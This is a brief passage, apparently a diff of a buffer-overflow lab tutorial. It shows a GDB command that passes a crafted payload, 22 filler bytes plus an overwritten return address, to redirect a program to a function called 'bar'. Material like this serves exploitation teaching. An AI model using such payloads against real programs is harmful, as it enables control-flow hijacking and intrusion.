Buffer Overflow Attack

 Executing the Attack in GDB

-Set the program arguments to the constructed payload and set a breakpoint at the bar
+Set the program arguments to the constructed payload and set a breakpoint at the bar function:

 1 | (gdb) set args $(python3 -c 'import sys; sys.stdout.buffer.write(b"\x41"*22 + b"\xce\x62\x55\x56")') |